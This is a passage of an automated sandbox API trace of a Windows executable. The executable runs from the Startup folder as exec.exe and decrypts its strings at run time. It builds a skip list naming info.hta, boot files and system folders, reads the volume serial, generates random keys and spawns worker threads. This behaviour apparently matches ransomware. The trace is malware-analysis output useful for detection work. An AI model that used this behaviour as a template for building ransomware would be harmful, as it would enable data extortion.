phKey=0x33f6ac*=0xa29008) returned 1 [0132.607] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f694, dwFlags=0x0) returned 1 [0132.607] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f57b8, pdwDataLen=0x33f660 | out: pbData=0x20f57b8, pdwDataLen=0x33f660) returned 1 [0132.607] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.607] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f57b8 | out: hHeap=0x20f0000) returned 1 [0132.607] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x20f5728, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0132.607] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f97b0 | out: hHeap=0x20f0000) returned 1 [0132.607] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227ed8 | out: hHeap=0x20f0000) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x60) returned 0x20f14d0 [0132.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f668, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6d0 | out: phKey=0x33f6d0*=0xa29008) returned 1 [0132.607] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6b8, dwFlags=0x0) returned 1 [0132.608] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d0, pdwDataLen=0x33f684 | out: pbData=0x20f14d0, pdwDataLen=0x33f684) returned 1 [0132.608] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.608] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x5c) returned 0x2227ed8 [0132.608] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x5c) returned 0x2227f40 [0132.608] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f57b8 [0132.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f640, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6a8 | out: phKey=0x33f6a8*=0xa29008) returned 1 [0132.608] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f690, dwFlags=0x0) returned 1 [0132.608] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f57b8, pdwDataLen=0x33f65c | out: pbData=0x20f57b8, pdwDataLen=0x33f65c) returned 1 [0132.608] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f57b8 | out: hHeap=0x20f0000) returned 1 [0132.608] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x2227ed8, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0132.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227f40 | out: hHeap=0x20f0000) returned 1 [0132.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d0 | out: hHeap=0x20f0000) returned 1 [0132.608] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f57b8 [0132.608] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20fb798 [0132.608] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fb798, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0132.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fb798 | out: hHeap=0x20f0000) returned 1 [0132.608] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xb38) returned 0x20fb798 [0132.608] GetLastError () returned 0x0 [0132.608] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20fb798, Size=0xb46) returned 0x20fb798 [0132.608] GetLastError () returned 0x0 [0132.608] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f97b0, Size=0x98) returned 0x20f59d0 [0132.608] GetLastError () returned 0x0 [0132.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f82c | out: phKey=0x33f82c*=0xa29008) returned 1 [0132.608] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f814, dwFlags=0x0) returned 1 [0132.608] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f7e0 | out: pbData=0x20f1470, pdwDataLen=0x33f7e0) returned 1 [0132.609] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.609] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1498 [0132.609] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f5498 [0132.609] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f54c0 [0132.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f79c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f804 | out: phKey=0x33f804*=0xa29008) returned 1 [0132.609] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f7ec, dwFlags=0x0) returned 1 [0132.609] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f54c0, pdwDataLen=0x33f7b8 | out: pbData=0x20f54c0, pdwDataLen=0x33f7b8) returned 1 [0132.609] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.609] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f54c0 | out: hHeap=0x20f0000) returned 1 [0132.609] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0132.609] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0132.609] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0132.609] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x33f86c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x33f86c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.609] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1498 | out: hHeap=0x20f0000) returned 1 [0132.609] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x20f1470 [0132.609] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226bc0 [0132.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f73c | out: phKey=0x33f73c*=0xa29008) returned 1 [0132.609] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f724, dwFlags=0x0) returned 1 [0132.609] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226bc0, pdwDataLen=0x33f6f0 | out: pbData=0x2226bc0, pdwDataLen=0x33f6f0) returned 1 [0132.609] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.609] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226bd8 [0132.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6cc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f734 | out: phKey=0x33f734*=0xa29008) returned 1 [0132.609] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f71c, dwFlags=0x0) returned 1 [0132.610] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226bd8, pdwDataLen=0x33f6e8 | out: pbData=0x2226bd8, pdwDataLen=0x33f6e8) returned 1 [0132.610] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226bf0 [0132.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f72c | out: phKey=0x33f72c*=0xa29008) returned 1 [0132.610] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f714, dwFlags=0x0) returned 1 [0132.610] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226bf0, pdwDataLen=0x33f6e0 | out: pbData=0x2226bf0, pdwDataLen=0x33f6e0) returned 1 [0132.610] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c08 [0132.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6bc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f724 | out: phKey=0x33f724*=0xa29008) returned 1 [0132.610] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f70c, dwFlags=0x0) returned 1 [0132.610] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226c08, pdwDataLen=0x33f6d8 | out: pbData=0x2226c08, pdwDataLen=0x33f6d8) returned 1 [0132.610] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0132.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f71c | out: phKey=0x33f71c*=0xa29008) returned 1 [0132.610] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f704, dwFlags=0x0) returned 1 [0132.610] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x33f6d0 | out: pbData=0x20f5498, pdwDataLen=0x33f6d0) returned 1 [0132.610] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c20 [0132.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f714 | out: phKey=0x33f714*=0xa29008) returned 1 [0132.610] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6fc, dwFlags=0x0) returned 1 [0132.610] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226c20, pdwDataLen=0x33f6c8 | out: pbData=0x2226c20, pdwDataLen=0x33f6c8) returned 1 [0132.610] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x70) returned 0x20f5530 [0132.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6a4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f70c | out: phKey=0x33f70c*=0xa29008) returned 1 [0132.610] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6f4, dwFlags=0x0) returned 1 [0132.610] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5530, pdwDataLen=0x33f6c0 | out: pbData=0x20f5530, pdwDataLen=0x33f6c0) returned 1 [0132.610] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.610] htonl (hostlong=0x9c354b42) returned 0x424b359c [0132.610] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x20, pbBuffer=0x33f800 | out: pbBuffer=0x33f800) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x28) returned 0x20f14a0 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c38 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4) returned 0x20f1748 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x14) returned 0x20f5728 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c50 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x80) returned 0x20f5748 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c68 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x82) returned 0x20f97b0 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c80 [0132.610] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4) returned 0x22273a8 [0132.610] CryptGenRandom (in: hProv=0xa29090, dwLen=0x55, pbBuffer=0x33f76a | out: pbBuffer=0x33f76a) returned 1 [0132.610] GetLastError () returned 0x0 [0132.610] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x22273b8, Size=0x82) returned 0x20f9840 [0132.610] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x22273d8, Size=0x100) returned 0x2227790 [0132.611] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226cf8 [0132.611] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x82) returned 0x20f98d0 [0132.611] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226d10 [0132.611] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x82) returned 0x20f9960 [0132.611] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f9840, Size=0x104) returned 0x2227898 [0132.611] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f98d0, Size=0x104) returned 0x22279a8 [0132.611] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f5748, Size=0x100) returned 0x2227ab8 [0132.611] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x2227790, Size=0x200) returned 0x2227bc0 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22273c8 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227bc0 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226ce0 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f57d0 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c98 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5858 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226cc8 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226cb0 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22279a8 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226cf8 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f9960 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226d10 | out: hHeap=0x20f0000) returned 1 [0132.611] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1748 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c38 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f97b0 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c68 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227ab8 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c50 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22273a8 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c80 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14a0 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5728 | out: hHeap=0x20f0000) returned 1 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xa4) returned 0x20f5728 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x62) returned 0x20f57d8 [0132.612] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f57d8, Size=0xc2) returned 0x20f57d8 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c80 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xb40) returned 0x20fc2e8 [0132.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f704 | out: phKey=0x33f704*=0xa29008) returned 1 [0132.612] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6ec, dwFlags=0x0) returned 1 [0132.612] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x33f6b8 | out: pbData=0x20fc2e8, pdwDataLen=0x33f6b8) returned 1 [0132.612] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c50 [0132.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f694, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6fc | out: phKey=0x33f6fc*=0xa29008) returned 1 [0132.612] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6e4, dwFlags=0x0) returned 1 [0132.612] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226c50, pdwDataLen=0x33f6b0 | out: pbData=0x2226c50, pdwDataLen=0x33f6b0) returned 1 [0132.612] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f58a8 [0132.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f66c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6d4 | out: phKey=0x33f6d4*=0xa29008) returned 1 [0132.612] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6bc, dwFlags=0x0) returned 1 [0132.612] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f58a8, pdwDataLen=0x33f688 | out: pbData=0x20f58a8, pdwDataLen=0x33f688) returned 1 [0132.612] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x84) returned 0x20f97b0 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x84) returned 0x20f9960 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227790 [0132.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f644, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6ac | out: phKey=0x33f6ac*=0xa29008) returned 1 [0132.612] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f694, dwFlags=0x0) returned 1 [0132.612] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227790, pdwDataLen=0x33f660 | out: pbData=0x2227790, pdwDataLen=0x33f660) returned 1 [0132.612] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227790 | out: hHeap=0x20f0000) returned 1 [0132.612] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x20f97b0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f9960 | out: hHeap=0x20f0000) returned 1 [0132.612] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f58a8 | out: hHeap=0x20f0000) returned 1 [0132.612] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x60) returned 0x20f58a8 [0132.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f668, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6d0 | out: phKey=0x33f6d0*=0xa29008) returned 1 [0132.612] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6b8, dwFlags=0x0) returned 1 [0132.613] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f58a8, pdwDataLen=0x33f684 | out: pbData=0x20f58a8, pdwDataLen=0x33f684) returned 1 [0132.613] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.613] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x5c) returned 0x20f5910 [0132.613] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x5c) returned 0x2227790 [0132.613] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x22277f8 [0132.613] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f640, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6a8 | out: phKey=0x33f6a8*=0xa29008) returned 1 [0132.613] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f690, dwFlags=0x0) returned 1 [0132.613] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277f8, pdwDataLen=0x33f65c | out: pbData=0x22277f8, pdwDataLen=0x33f65c) returned 1 [0132.613] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.613] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277f8 | out: hHeap=0x20f0000) returned 1 [0132.613] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x20f5910, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0132.613] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227790 | out: hHeap=0x20f0000) returned 1 [0132.613] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f58a8 | out: hHeap=0x20f0000) returned 1 [0132.613] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x2227790 [0132.613] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x22279a8 [0132.613] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22279a8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0132.613] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22279a8 | out: hHeap=0x20f0000) returned 1 [0132.613] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xb38) returned 0x20fce30 [0132.613] GetLastError () returned 0x0 [0132.613] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f9960, Size=0x98) returned 0x22279a8 [0132.613] GetLastError () returned 0x0 [0132.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831edc, lpParameter=0x33f8a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98 [0132.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831958, lpParameter=0x33f8a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd4 [0132.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831a4b, lpParameter=0x33f8a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd0 [0132.615] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0212.567] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0212.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f77c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7e4 | out: phKey=0x33f7e4*=0xa32928) returned 1 [0212.567] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7cc, dwFlags=0x0) returned 1 [0212.567] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x33f798 | out: pbData=0x20fd988, pdwDataLen=0x33f798) returned 1 [0212.567] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.567] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0212.567] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0212.567] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0212.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f754, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7bc | out: phKey=0x33f7bc*=0xa32928) returned 1 [0212.567] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7a4, dwFlags=0x0) returned 1 [0212.567] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x33f770 | out: pbData=0x20f5498, pdwDataLen=0x33f770) returned 1 [0212.567] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.567] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0212.567] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0212.567] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0212.567] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0212.567] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x33f824, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x33f824*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0212.568] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: 